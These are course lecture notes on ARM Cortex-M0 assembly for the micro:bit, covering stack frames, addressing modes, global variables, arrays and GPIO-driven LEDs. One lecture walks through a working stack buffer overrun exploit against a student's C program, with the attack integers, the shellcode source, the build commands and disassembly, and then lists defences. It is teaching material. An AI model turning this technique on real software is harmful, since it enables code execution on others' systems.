Each invocation of a subroutine is associated with a block of memory on the program's stack that we call the stack frame for the invocation. The stack pointer begins at the top of memory, and as subroutine calls nest, it moves towards lower addresses, so that the stack grows downwards into an area of 2kB or more of memory that is dedicated to it. When a subroutine is entered, the initial push instruction (if any) saves some registers and decrements the stack pointer, leaving it pointing at the last value to be saved; then the subroutine may contain an explicit sub instruction that decrements the stack pointer further, reserving space for local variables whose addresses are at positive offsets from the stack pointer. The instruction set is designed to make access to these variables simple and efficient. The size of the local variables should be a multiple of 4 bytes, so that the stack pointer is always a multiple of 4. On larger ARM processors, there is a convention that the stack pointer should be a multiple of 8 whenever a subroutine is entered, but there is no need for this stronger convention on the Cortex-M0 processor, so we ignore it.

Other subroutines called by this one may push their own frames on the stack, but remove them before exiting, so that the stack pointer has a consistent value whenever this subroutine is running. At the end of a subroutine with local variables, the operations on the stack pointer are reversed: first we add back to the stack pointer the same quantity that was subtracted on entry, then there is a pop instruction that restores those registers that were saved on entry, also putting the return address back into the pc.

Example: factorial with local variables

Let's begin with an example: an implementation of factorial that calls a subroutine for multiplication, but instead of keeping values in the callee-save registers r4 to r7 across subroutine calls, keeps them in slots in its stack frame. As before, we will implement an assembly language equivalent to the following C subroutine.

int func(int x, int y)
{
    int n = x, f = 1;

    while (n != 0) {
        f = mult(f, n);
        n = n-1;
    }

    return f;
}

We'll keep the values of n and f in two slots in the stack frame for the subroutine:

     |  Stack frame   |
     |    of caller   |
     +================+
     |  Saved lr      |
     +----------------+
     |  Local n       |
     +----------------+
 sp: |  Local f       |
     +================+

The subroutine won't use registers r4 to r7 at all, so there's no need to save them on entry, but we do need to save lr, and we also need to adjust the stack pointer so as to allocate space for n and f.

func:
    push {lr}
    sub sp, sp, #8          @ Reserve space for n and f

Because each of the integer variables n and f occupies four bytes, we must subtract 8 from the stack pointer.

Next, we should set n and f to their initial values: n to the parameter x that arrived in r0, and f to the constant 1, which we put in a register and then store into f's slot in the stack frame.

    str r0, [sp, #4]        @ Save n in the frame
    movs r0, #1             @ Set f to 1
    str r0, [sp, #0]

The two str instructions each transfer a value from r0 to a slot in memory whose address is obtained by adding to the stack pointer sp a constant offset, 4 for n and 0 for f.

Now we come to the loop in the body of func. Whenever we want to use n or f, we must use a load instruction ldr to fetch it from the appropriate stack slot. For efficiency, we can fetch n once into r1, and then use it for both the test n != 0 and the function call mult(f, n) without fetching it again.

again:
    ldr r1, [sp, #4]        @ Fetch n
    cmp r1, #0              @ Is n = 0?
    beq finish              @ If so, finished

    ldr r0, [sp, #0]        @ Fetch f
    bl mult                 @ Compute f * old n
    str r0, [sp, #0]        @ Save as new value of f

    ldr r0, [sp, #4]        @ Fetch n again
    subs r0, r0, #1         @ Compute n-1
    str r0, [sp, #4]        @ Save as new n

    b again                 @ Repeat

Values in r0 to r3 may be overwritten by the mult subroutine, but the values stored in the stack frame will not be affected by the subroutine, and we can implement n = n-1 by fetching n again from its slot after the subroutine call, decrementing it, and storing the result back into the same slot.

When the loop terminates, we need to fetch the final value of f into r0 so that it becomes the result of the subroutine. Then the stack pointer is adjusted back upwards to remove n and f from the stack before popping the return address.

finish:
    ldr r0, [sp, #0]        @ Return f
    add sp, sp, #8          @ Deallocate locals
    pop {pc}

It's clear that holding local variables in the stack frame is more cumbersome than saving some registers on entry to the subroutine and then using them to hold the local variables. It's only when a subroutine needs more than about four local variables that we would want to do so, and even then we would want to keep the most used four of them in registers, mixing the two techniques.

Addressing modes

For each load or store instruction, the address of the item in memory that is transferred to or from a register is obtained by a calculation that may involve the contents of other registers and also a small constant. Each way of calculating the address is called an addressing mode, and addressing on ARM processors has two main modes that we can call reg+const and reg+reg. As an example of the reg+const addressing mode, the instruction

ldr r0, [r1, #20]

takes the value occupying register r1 and adds the constant 20 to it to form an address (which must be a multiple of four). It fetches the 4-byte quantity from this address and loads it into register r0. In a typical use of this instruction, r1 contains the address of a multi-word object in memory (such as an array), and the constant 20 contains the offset from there to a particular word in the object. There is a matching instruction

str r0, [r1, #20]

where the address is calculated in the same way, but the value in r0 is stored into the memory location at that address. Also provided is the reg+reg addressing mode, with typical syntax

ldr r0, [r1, r2]

or

str r0, [r1, r2]

where the offset part of the address is obtained from a register: the two named registers are added together to obtain the address (again a multiple of 4) for loading or storing the value in r0.

In native ARM code, these two forms can be used with any registers, and some other possibilities are provided. When forming an address by adding two registers, it's possible to scale one of the registers by a power of two by shifting it left some number of bits, giving an addressing mode that we can describe as reg+reg<<scale, with the assembly language syntax

ldr r0, [r1, r2, LSL #2]     @ Native code only!

This form is particularly useful when the register shown here as r1 contains the base address of an array, and r2 contains an index into the array, because as we'll see later, the index of an array must be multiplied by the size of each element to find the address of a particular element. In Thumb code, we will have to do the scaling in a separate instruction. Native ARM code also provides other, less frequently used addressing modes that are unsupported in Thumb code and needn't be described here.

In Thumb code, the options provided are the two forms shown above, where the registers shown as r0, r1 and r2 may be replaced by any of the low registers r0 to r7. In addition, three special-purpose instruction encodings are provided that use the stack pointer register sp or the program counter pc as a base register with the addition of a constant. The two instructions with syntax

ldr r0, [sp, #20]

and

str r0, [sp, #20]

provide access to local variables stored in the stack frame of the current procedure, addressed at fixed offsets from the stack pointer. Also, the form

ldr r0, [pc, #40]

loads a word that is located at a fixed offset from the current pc value: this is a mechanism for access to a table of large constants that is placed in ROM next to the subroutine that uses the constants. In the Thumb encoding, the constants allowed in the forms ldr r0, [r1, #const] and ldr r0, [sp, #const] and ldr r0, [pc, #const] are subject to different ranges that are listed in the architecture manual: suffice it to say that the ranges are large enough for most instructions we will want to write.

Global variables

As well as local variables declared inside a function, C also allows global or static variables declared outside any function. These are accessible from any function in the same file (for static variables) or in the whole program (for global variables), and importantly they continue to exist even when the functions that access them are not being invoked. Here's a tiny example:

int count = 0;

void increment(int n)
{
    count = count + n;
}

(Note that the body of increment can be abbreviated to count += n; but any decent C compiler will produce the same code whichever way the function is written.)

How can we implement the same function in assembly language? The answer is a complicated story that is best told backwards. In the program as it runs, the global variable count will have a fixed location in RAM: let's suppose that location is 0x20000234. If that address is already in register r1 and n is in r0, then we can achieve the effect of count = count + n in three instructions: fetch the current value of count, add n to it, and store the result back into count.

    ldr r2, [r1]
    adds r2, r2, r0
    str r2, [r1]

The addressing mode [r1] uses the value in r1 as the address, and is just an abbreviation for [r1, #0]. Now the problem is this: how can we get the constant address 0x20000234 into a register? We can't write

    movs r1, #0x20000234     @ Wrong!

because that huge constant won't fit in the eight-bit field provided in an immediate move instruction. In Thumb code, the solution is to place the constant somewhere in memory just after the code for the increment function (typically, that means placing it in ROM), then use a pc-relative load instruction to move it into a register.

    ldr r1, [pc, #36]
    ...                A
    ...                |
    ...              36 bytes
    ...                |
    ...                V
    .word 0x20000234

The idea is that, although the constant 0x20000234 won't fit in an instruction, the offset shown here as 36 between the ldr instruction and the place that value sits in the ROM is small enough to fit in the (generously sized) field of the ldr instruction. The effect of the C statement count = count + n can therefore be achieved in four instructions:

    ldr r1, [pc, #36]
    ldr r2, [r1]
    adds r2, r2, r0
    str r2, [r1]

plus, of course, arranging that the constant 0x20000234 appears in memory in the expected place. Though we use count twice, once to load and once to store, we only need to put its address in a register once. Although this scheme works well when the program runs, it's a bit difficult to set up when we write the program. We don't want to have to count the offset 36 between the first ldr instruction and the place the constant sits in the ROM, or to update it every time we slightly change the program; also, we don't want to have to assign addresses like 0x20000234 manually and make sure that different variables get different addresses. When writing a program, we will get the assembler and linker to help with these details.

Context

If you are familiar with assembly language programming for Intel chips, it may seem disappointing that the ARM needs four instructions to increment a global variable, when the x86 can do it in just one, written incl counter using unix conventions. When comparing the two machines, we should bear in mind that on most implementations of the x86 instruction set, execution of the instruction will be broken down into multiple stages, first decoding the 6-byte instruction and extracting the 32-bit address from it, then fetching from that address, incrementing, and storing back into the same address. The difference between the two machines relates less to how the operation is executed, and more to how the sequence of actions is encoded as instructions.

First, we'll introduce a name counter for the global variable. In the assembly language program, the value counter will be the address of the variable. Instead of writing

    ldr r1, [pc, #36]

and placing the constant manually in the right place, the assembler lets us write

    ldr r1, =counter

and looks after finding a place for the constant and filling in the required offset, then translates the instruction as a pc-relative load. The assembler keeps a list of values that have been used in such ldr instructions, and whenever it can do so, outputs the list and fills in the offsets in instructions that refer to the values. It always outputs constants at the end of the assembly language file, and also in places where we give a .pool or .ltorg directive; it is safe to do so between subroutines, and also in other places that can never be reached by the program, such as immediately after an unconditional branch and before an ensuing label. With smallish fragments of assembly language, there's no need to do anything, provided the offset range of the pc-relative load instructions is large enough to reach to the end of the file.

An important detail that's dealt with for us: in Thumb code, when an instruction like ldr r1, [pc, #36] is executed, the value that is used for pc is the address of the instruction plus 4, because pipelining means that the processor will already have fetched the next instruction and incremented the PC beyond it by the time this instruction is executed. In the pc-relative ldr instruction, this pc value is then rounded down to a multiple of 4 before the constant 36 (always itself a multiple of 4) is added to it. The assembler takes care of these details for us, and the rules only become apparent if we look at the binary machine code, or if we try (as we will next term) to design an implementation of the instruction set.

As well as placing the 32-bit constant appropriately, we also want to place the counter variable itself in RAM without having to assign its address for ourselves, and be sure that the storage it uses does not overlap with other variables. To do this, we must add the following lines to the end of the assembly language file.

    .bss          @ Place the following in RAM
    .balign 4     @ Align to a multiple of 4 bytes
counter:
    .word 0       @ Allocate a 4-byte word of memory

The first directive (.bss) directs the assembler to place the variable in the BSS segment, which the linker will assign to RAM, and the startup code will initialise with zeroes. This directive complements the .text directive that came before the increment subroutine: that code goes in the text segment and is placed by the linker in ROM, and this data is placed in RAM.

The next directive (.balign 4) pads the BSS segment with zero bytes until its length is a multiple of 4, so as to be sure that the variable is aligned on a 4-byte boundary. Such alignment directives on unix-based systems have a vexed history, because the directive .align n sometimes aligns on an n-byte boundary and sometimes on a \(2^n\)-byte boundary, depending on the target processor and sometimes even on the format of object file that is being used. The Gnu assembler provides a pair of unambiguous directives .balign n and .p2align n that remove this doubt, and it's best to use them in all new programs.

Now we can allocate space for the variable, by first placing a label (counter:), then assembling a 4-byte word with value zero (.word 0). Taken together, these four lines of assembly language cause the assembler to output requests to the linker to reserve a 4-byte space in RAM, ensuring it is aligned on a 4-byte boundary, and to put its address into the constant table from where it can be accessed by the code for the increment subroutine. The lines can be put either before or after the code for the subroutine, because the assembler doesn't generally mind about names (like counter here) being used before they are defined.

Disassembling the object file that results from the code shown here reveals that the linker has placed the increment subroutine at address 0x150 and the counter variable at address 0x20000004.

00000150 <increment>:
 150:   4902            ldr     r1, [pc, #8]    ; (15c <increment+0xc>)
 152:   680a            ldr     r2, [r1, #0]
 154:   1812            adds    r2, r2, r0
 156:   600a            str     r2, [r1, #0]
 158:   4770            bx      lr
 15a:   0000            .short  0x0000
 15c:   20000004        .word   0x20000004

The pc-relative load instruction at address 0x150 contains an offset of 8, which is correct because 0x150 + 4 + 8 = 0x15c, and the constant is placed at that address. At 0x15a are two bytes of padding, included so that the constant is aligned on a 4-byte boundary as it should be, followed by the constant itself, whose value is the address of the variable in the BSS segment.

Arrays

[6.5] Individual global or local variables are useful, but more useful still is the ability to access elements of an array by indexing. That entails being able to calculate the address of the location accessed by a load or store instruction. The address of the i'th element a[i] of an array a is base + i * elsize, where base is the starting address of the array and elsize is the size of one element.

Array indexing

The ARM helps with this calculation by providing a form of the ldr and str instructions (an addressing mode) where the memory address is computed as the sum of two registers, as in ldr r0, [r1, r2]. This instruction adds together the values in r1 and r2 to form an address, loads the 4-byte word from this address, and puts the value in r0. Typically, r1 might contain the base address of an array, and r2 might contain 4 times the index, usually computed by means of a left-shift instruction lsls r2, r2, #2.
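The same address calculation can be written out by hand in C (a sketch):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    int a[10];
    int i = 3;

    /* base + i * elsize, the sum the indexed load performs */
    int *p = (int *) ((uintptr_t) a + i * sizeof(int));
    printf("%d\n", p == &a[i]);     /* prints 1 */
    return 0;
}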

We can experiment with these instructions by building a "bank account" program that maintains an array of integers, with a function func(x, y) that we could define in C like this:

int account[10];

int func(int x, int y)
{
    int z = account[x] + y;
    account[x] = z;
    return z;
}

Given an account number x and an amount y, this function increases the balance of account x by y and returns the new balance. (We could write the entire routine body as return account[x] += y, but that's more obscure, and a good C compiler will produce identical code either way.)

Let's write the same thing in assembly language. We will need to allocate space for the array: 40 bytes, aligned on a 4-byte boundary and allocated in the BSS segment.

    .bss                @ Allocate space in the uninitialised data segment
    .balign 4           @ Pad to a 4-byte boundary
account:
    .space 40           @ Allocate 40 bytes

Now here's the function itself.

    .text               @ Back to the text segment
    .global func
    .thumb_func
func:
    ldr r3, =account    @ Base address of array in r3
    lsls r2, r0, #2     @ Offset of element x
    ldr r0, [r3, r2]    @ Fetch the element
    adds r0, r0, r1     @ Increment by y
    str r0, [r3, r2]    @ Save the new value
    bx lr               @ New value is also result

Some things to note:

  • The address of account is a large constant, unknown until the program is linked – just like the address of the count variable in the previous example. We can get it in a register using the ldr = method: this gives us the address of the array element account[0], not yet its value.
  • To access the element account[x], we need to compute the offset 4*x in bytes from the beginning of the array. We can multiply by four using a left shift.
  • The address of an array element is obtained by adding base and offset, using the reg+reg addressing mode. It's cheaper to do this calculation twice, once in the ldr and once in the str, than to compute it once into a register, which would take an extra instruction.
  • Both base and offset can be shared between the two accesses to the array. A compiler would spot this as part of its optimisation of the program, and would, like us, express this insight by setting r3 and r2 once and using each twice.

The example uses a global array that persists from one invocation of func to the next – otherwise the program would be pointless. It's also possible to allocate a local array in the stack frame of a procedure, so that it lives only as long as an invocation of the procedure. To allocate space for it, subtract a suitably large constant from the stack pointer on entry, and add it back on exit. There's a useful form of add instruction that adds the sp value and a moderately sized constant and puts the result in a register:

add r0, sp, #32

This is useful for computing the base address of the array into a register, and from there the process of indexing is the same as for a global array. It's up to us to plan the layout of the stack frame, though – something that is done by the compiler for programs written in C.

Other load and store instructions

The instructions ldr and str are the most frequently used, because they transfer a quantity as wide as a register to or from memory. Next in importance are the instructions ldrb and strb that transfer single characters. For example, the instruction

ldrb r0, [r1]

takes the single character in memory whose address is in r1 (the address need not be a multiple of 4), and transfers it to the least significant byte of r0, replacing the other three bytes with zeroes. As a complement, the instruction

strb r0, [r1]

takes the least significant byte of r0, ignoring anything held in the other three bytes, and stores it at the address found in r1. Both these instructions exist for Thumb code with the same reg+reg and reg+const addressing modes as the ldr and str instructions. There are also instructions ldrh and strh that load and store two-byte halfwords in the same way.

In addition to the ldrb instruction that loads an unsigned byte, padding it from 8 to 32 bits with zeroes, there is also an instruction ldrsb for loading a signed byte and replicating bit 7 into the upper 24 bits of the result. Similarly, there is an instruction ldrsh for loading signed halfwords. These instructions are less useful than the others, so they exist in Thumb code only with the reg+reg addressing mode; on the rare occasions that the reg+const addressing mode would be useful, the same effect can be obtained by following an unsigned load with an explicit sign extension sxtb or sxth. There is no need for 'signed store' instructions, because no matter whether the value is considered as signed or unsigned, the store instruction takes the bottom 8 or 16 bits of the value in the register and stores them into memory.
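The two kinds of byte load correspond to zero extension and sign extension in C (a sketch):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint8_t byte = 0xfe;            /* bit pattern 1111 1110 */
    uint32_t u = byte;              /* like ldrb: zero-extend, giving 254 */
    int32_t s = (int8_t) byte;      /* like ldrsb: sign-extend, giving -2 */
    printf("%u %d\n", u, s);
    return 0;
}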

Questions

Does the program always have to be in the Flash ROM and variables in RAM, or can we mix them?

On the micro:bit (and other ARM-based microcontrollers) both ROM and RAM form a single address space, with the two kinds of memory occupying different address ranges: 0 to 0x3ffff for ROM and 0x20000000 to 0x20003fff for RAM. Although it's convenient to put all the code for a program in ROM, so that it survives times when the chip is powered down, it's perfectly possible for the processor to execute code that is stored in RAM – perhaps generated dynamically as the program runs, or downloaded from an external source and held in RAM temporarily. Still more usefully, the processor can access data held in ROM, such as string constants, or tables of constant data that are particularly useful in embedded programming, and it can use the same load instructions to do so as it uses to access data in the RAM, just with different addresses. What you can't do, of course, is have data that changes held in the ROM, and modify it using ordinary store instructions. Executing a store instruction with an address in ROM space either results in no change, or leads to an exception and the Seven Stars of Death – I wonder which?

It is possible for the contents of ROM to change under program control, so that (for example) embedded systems can load new versions of their software 'over the air'. For that to happen, the ROM is accessed like an I/O device via the Non Volatile Memory Controller (NVMC), and not using ordinary instructions. It's usually not possible to be running a program held in ROM at the same time as the ROM is being overwritten, so the usual practice is to copy the code that controls the writing into RAM and execute it from there. This is not quite what happens when we download a program to the micro:bit: instead, the second processor on the board takes control of the main processor via its debug interface, and by that means is able to make the NVMC load a program into the ROM.


Lecture 7 – Buffer overrun attacks

A hacker's guide.

The victim

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void)
{
    char buf[64];
    getline(buf);
    return atoi(buf);
}

void init(void)
{
    int n = 0, total;
    int data[10];

    serial_init();

    printf("Enter numbers, 0 to finish\n");
    while (1) {
        int x = getnum();
        if (x == 0) break;
        data[n++] = x;
    }

    total = 0;
    for (int i = 0; i < n; i++)
        total += data[i];
    
    printf("Total = %d\n", total);    
}   

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string HACKED!!.

The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.
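The repair, for reference, is a one-line bounds check before the store (a sketch; everything else stays the same):

    while (1) {
        int x = getnum();
        if (x == 0) break;
        if (n == 10) break;     /* array full: stop accepting input */
        data[n++] = x;
    }

But the rest of this lecture is about what happens when the check is missing.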

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems.

There is actually another, more insidious, problem in the program, and that is the interface of the routine getline, which takes as a parameter the address of a character array to store the line, but has no way of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.
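Rewritten with fgets, the student's getnum could at least not overflow its buffer – a sketch, assuming input arrives on the standard input:

#include <stdio.h>
#include <stdlib.h>

int getnum(void)
{
    char buf[64];
    if (fgets(buf, sizeof buf, stdin) == NULL)
        return 0;               /* treat end of input as 0 */
    return atoi(buf);
}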

Mounting the attack

Used ordinarily, the program fulfils its purpose.

Enter numbers, 0 to finish
> 123
> 456
> 7
> 0
Total = 586

After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.

Enter numbers, 0 to finish
> -1610370930
> 1200113921
> 59387
> 1217
> 1262698824
> 555828293
> 32
> 1
> 1
> 1
> 1
> 1
> 1
> 536887217
> 0

As you will see, the program runs haywire, printing the same message over and over again. (In the lecture, I used a helper program squirt running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)

Analysing the attack

So what are those 14 magic numbers, and how were they determined?

First, we notice that there are 14 numbers, and the buffer declared locally in init has space for only 10 numbers. The first 10 numbers that are input fill up the data array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | Saved R5 value                 |
    +--------------------------------+
    | Saved R4 value                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 10 words for data array        |
sp: |                                |
    +--------------------------------+

We can deduce the layout of init's frame by looking at its code, obtained by disassembling the program. The code begins like this:

00000224 <init>:
 224:   b530            push    {r4, r5, lr}
 226:   b08b            sub     sp, #44 ; 0x2c
 228:   f7ff ff4a       bl      c0 <serial_init>
 22c:   480d            ldr     r0, [pc, #52]   ; (264 <init+0x40>)
 22e:   f000 f947       bl      4c0 <printf>
 232:   2400            movs    r4, #0
 234:   f7ff ffec       bl      210 <getnum>
 238:   2800            cmp     r0, #0
 23a:   d004            beq.n   246 <init+0x22>
 23c:   00a3            lsls    r3, r4, #2
 23e:   466a            mov     r2, sp
 240:   5098            str     r0, [r3, r2]
 242:   3401            adds    r4, #1
 244:   e7f6            b.n     234 <init+0x10>

The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.

The local variable n lives in register r4, and later in the function, the statement data[n++] = x is translated into the four instructions starting with lsls at address 0x23c: first r3 is set to 4*n, then r2 is set to the value of sp, and x, currently resident in r0, is stored into an address formed by adding r2 and r3, just as we would expect if the array begins at the stack pointer as the picture shows.

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init with a value of our choosing. By doing this, we can arrange that when init returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data array by the victim. In a more complicated program, different calls to init might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

40 bytes of code
Another 12 bytes of padding
Address of the code

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After the stack frame of init has been overwritten by the input loop, the rest of init runs as usual: the total of the 14 numbers we have input is computed and printed. Then init returns to our chosen return address, and the code we placed in the buffer starts to run.

Context

The layout of the stack frame for init is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .equ printf, 0x4c0      @ Address of printf
    .equ frame, 0x20003fb0  @ Captured stack pointer value in init

    .text
attack:
    sub sp, #56             @  0: Reserve stack space again
again:
    adr r0, message         @  2: Address of our message
    ldr r1, =printf+1       @  4: Absolute address for call
    blx r1                  @  6: Call printf
    b again                 @  8: Spin forever
    .pool                   @ 12: constant pool
message:
    .asciz "HACKED!! "      @ 16: string -- 10 bytes
    .balign 4, 0            @ pad to 28 bytes
    .word 1, 1, 1, 1        @ 28: fill up to 44 bytes
    .word 1, 1              @ 44: Saved r4, r5
    .word frame+1           @ 52: Faked return address
                            @ Total size 56

By the time this code is reached, init will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf, its stack frame will not overwrite our code. Then there is a call that passes the message to printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

  • The adr instruction assembles into an instruction add r0, pc, #n that sets r0 to the address of the message: the assembler determines the value of n.
  • The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
  • The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
  • The directive .balign 4, 0 pads the program with zero bytes (0) until its size is a multiple of 4.
  • Each .word directive contributes a four-byte word to the output of the assembler.
  • The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
  • We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the (slightly misnamed) hexdump utility to format the binary data as a sequence of decimal integers.

hexdump -v -e '/4 "%d\n"' attack.bin >attack

The file attack then contains the fourteen lines shown earlier as input to the milk bill program. There's a little program squirt that runs on the host and outputs the text like keystrokes to the serial interface of the micro:bit.
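In outline, squirt need be no more than a loop that copies the file to the serial device, one line at a time. Here is a minimal sketch for a Linux host – an illustration rather than the real squirt, assuming the device appears as /dev/ttyACM0 (typical for the micro:bit) and that the port is already set for the right baud rate:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    FILE *in = fopen("attack", "r");          /* the file of fourteen integers */
    int fd = open("/dev/ttyACM0", O_WRONLY);  /* serial port to the micro:bit */
    char line[32];

    while (fgets(line, sizeof line, in) != NULL)
        write(fd, line, strlen(line));        /* send each line like keystrokes */

    close(fd);
    fclose(in);
    return 0;
}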

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.

00000000 <attack>:
   0:   b08e            sub     sp, #56 ; 0x38
   2:   a003            add     r0, pc, #12     ; (adr r0, 10 <message>)
   4:   4901            ldr     r1, [pc, #4]    ; (c <attack+0xc>)
   6:   4788            blx     r1
   8:   e7fb            b.n     2 <attack+0x2>
   a:   0000            .short  0x0000
   c:   000004c1        .word   0x000004c1

00000010 <message>:
  10:   4b434148        .word   0x4b434148
  14:   21214445        .word   0x21214445
  18:   00000020        .word   0x00000020
  1c:   00000001        .word   0x00000001
  20:   00000001        .word   0x00000001
  24:   00000001        .word   0x00000001
  28:   00000001        .word   0x00000001
  2c:   00000001        .word   0x00000001
  30:   00000001        .word   0x00000001
  34:   20003fb1        .word   0x20003fb1

For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e.

It's possible to use the debugger to capture the precise moment when the pc jumps to an unexpected value. Another page has a (manual) script to follow.

Defence against the dark arts

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

  1. We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
  2. This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
  3. Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
  4. The attack depended on knowing a couple of addresses – the address of the init stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.

Linux has at least some of these defences enabled by default, and repeating the attack there is rather more difficult.



  1. That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of init's original return address also has a +1.

Lecture 8 – Introducing I/O

Memory-mapped I/O. GPIO. Multiplexed LED display.

We now move beyond the core of the processor (designed by ARM) to look at I/O devices (designed by Nordic Semiconductor and documented in their separate datasheet). The simplest I/O device is called GPIO (General Purpose Input/Output) and allows 32 pins of the chip to be individually configured either as outputs, producing a voltage under control of the program, or as inputs, so that the program can sense whether an externally applied voltage on the pin is high or low. On the micro:bit, we can put the GPIO pins to immediate use because some of them are connected to 25 LEDs and two push-buttons.

Basics of LEDs

[8.1] LEDs, like most semiconductor diodes, conduct in only one direction, shown by the arrow on the circuit symbol. Thus, the circuit on the right will produce no light, whereas the circuit on the left does light the LED. It is necessary to connect a resistor in series with the LED in order to control the current. For a 3V supply, about 2V will be dropped across the LED, the remaining 1V will be dropped across the resistor, and a resistor of 220Ω will give a sensible current of 4.5mA through resistor and LED. It doesn't matter which side of the LED the resistor is connected, so long as it is there.

A matrix of LEDs

[8.2] A single GPIO pin can control an LED connected (with a series resistor) between the pin and ground: this is useful as a debugging aid in many prototypes. Alternatively, an LED and resistor could be connected between two GPIO pins A and B, and would light only if A is high and B is low. This is a useless idea, until we see that multiple LEDs can be connected in this way, as in the picture at the right. With these connections, the fifth LED from the left will light if B is high and Y is low; we can prevent the other LEDs from lighting by setting A low and X and Z high. In fact we can light any single LED by setting the pins appropriately, and we can light one group of three LEDs or the other in any pattern by setting either A or B high, and choosing to set X, Y and Z low in a pattern that corresponds to the LEDs we want to light. There are three series resistors at X, Y and Z to control the current through individual LEDs in each group of three. To show a pattern on all six LEDs, we will have to show the two groups alternately, changing between them quickly enough that the flickering is invisible. This "matrix" of six LEDs is the smallest that gives any saving over wiring the LEDs to individual I/O pins, since it uses five pins rather than six.

[8.3] On the micro:bit, though they are arranged physically in a 5x5 array, the LEDs are wired as three 'rows' of nine LEDs each (with two missing), with a documented correspondence to the physical layout.

Schematic of LEDs and buttons

Bits 4–12 of the GPIO register are used for the column lines, and bits 13–15 for the row lines.

0000|0000|0000|0000|R3 R2 R1 C9|C8 C7 C6 C5|C4 C3 C2 C1|0000

Context

Ad-hoc matrices of LEDs like the one on the micro:bit seem a bit amateurish (though fun). But the idea of LEDs addressed as a matrix is very common, because the 7-segment LED displays seen everywhere are usually built in this way. Each individual digit has seven (or eight with the decimal point) individual anodes and a common cathode. In a multidigit display, we can connect together corresponding anodes from each digit, and connect these through series resistors to eight GPIO pins. The common cathode for each display also gets its own GPIO pin, so the total number of pins needed is 8 plus the number of digits. In cheapo designs, the display can be multiplexed (as on the micro:bit) by bit-banging in software. But there are also special-purpose LED driver chips like the HT16K33 that do the same job in hardware, reducing the load on the processor.

Device registers

